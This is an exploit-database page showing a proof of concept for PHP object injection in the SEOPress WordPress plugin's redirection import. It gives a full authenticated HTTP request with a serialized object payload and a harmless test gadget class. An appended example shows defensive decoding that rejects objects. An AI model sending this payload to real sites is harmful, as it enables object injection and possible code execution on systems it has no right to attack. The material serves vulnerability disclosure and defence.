## https://sploitus.com/exploit?id=WPEX-ID:FB8791F5-2879-431E-9AFC-06D5839E4B9D
To simulate a gadget chain, put the following code in a plugin:

class Evil {
  public function __wakeup() : void {
    die("Arbitrary deserialization");
  }
}

Then view the response to the following request, which will contain the "Arbitrary deserialization" message:

POST /wordpress/wp-admin/admin.php?page=seopress-import-export HTTP/1.1
Host: {host}
Content-Length: 1247
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryURsXiXeTIw5lD9oX
Cookie: {cookie}

------WebKitFormBoundaryURsXiXeTIw5lD9oX
Content-Disposition: form-data; name="import_file"; filename="seopress-settings-export-03-04-2023.json"
Content-Type: application/json

{"seopress_activated":"","seopress_titles_option_name":"","seopress_social_option_name":"","seopress_google_analytics_option_name":"","seopress_advanced_option_name":"","seopress_xml_sitemap_option_name":"","seopress_pro_option_name":"","seopress_pro_mu_option_name":"","seopress_pro_license_key":"","seopress_pro_license_status":"","seopress_bot_option_name":"","seopress_toggle":"","seopress_google_analytics_lock_option_name":"","seopress_tools_option_name":"","seopress_dashboard_option_name":false,"seopress_instant_indexing_option_name":"","redirections":{"xxx":{"sources":"O:4:\"Evil\":0:{};"}}}
------WebKitFormBoundaryURsXiXeTIw5lD9oX
Content-Disposition: form-data; name="seopress_action"

import_rk_redirections
------WebKitFormBoundaryURsXiXeTIw5lD9oX
Content-Disposition: form-data; name="seopress_import_rk_redirections_nonce"

0e1a353e06
------WebKitFormBoundaryURsXiXeTIw5lD9oX
Content-Disposition: form-data; name="_wp_http_referer"

/wordpress/wp-admin/admin.php?page=seopress-import-export
------WebKitFormBoundaryURsXiXeTIw5lD9oX--
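
One way an import handler can decode a `sources` value like the one in the request above without instantiating classes, shown as an added example (not SEOPress code and not part of the original page). `safe_import_value` and `contains_object` are hypothetical helpers, the sample JSON is constructed from the request, and the `Evil` stand-in records the call instead of calling `die()`.

```php
<?php
// Added example: helper names are hypothetical; this is not the plugin's code.

// Stand-in for the page's Evil class: records the call instead of die().
class Evil {
    public static $woke = false;
    public function __wakeup(): void { self::$woke = true; }
}

// True if the decoded structure holds an object at any depth.
function contains_object($value): bool {
    // With allowed_classes => false, objects decode to __PHP_Incomplete_Class.
    if ($value instanceof __PHP_Incomplete_Class || is_object($value)) {
        return true;
    }
    if (is_array($value)) {
        foreach ($value as $item) {
            if (contains_object($item)) return true;
        }
    }
    return false;
}

// Decode possibly-serialized import data without instantiating any class.
// Returns null when the payload contains an object, so the caller can reject it.
function safe_import_value(string $raw) {
    $raw = trim($raw);
    $decoded = @unserialize($raw, ['allowed_classes' => false]);
    if ($decoded === false && $raw !== 'b:0;') {
        return $raw; // not serialized data: keep it as a plain string
    }
    return contains_object($decoded) ? null : $decoded;
}

// Constructed sample mirroring the "redirections" entry in the request above,
// plus one benign serialized array for comparison.
$json = '{"redirections":{'
      . '"xxx":{"sources":"O:4:\"Evil\":0:{};"},'
      . '"ok":{"sources":"a:1:{i:0;s:4:\"/old\";}"}}}';
$import = json_decode($json, true);

foreach ($import['redirections'] as $key => $row) {
    $sources = safe_import_value($row['sources']);
    $shown = $sources === null ? 'REJECTED (object payload)' : json_encode($sources);
    printf("%s => %s\n", $key, $shown);
}

// Stays false as long as Evil::__wakeup() was never invoked during decoding.
var_dump(Evil::$woke);
```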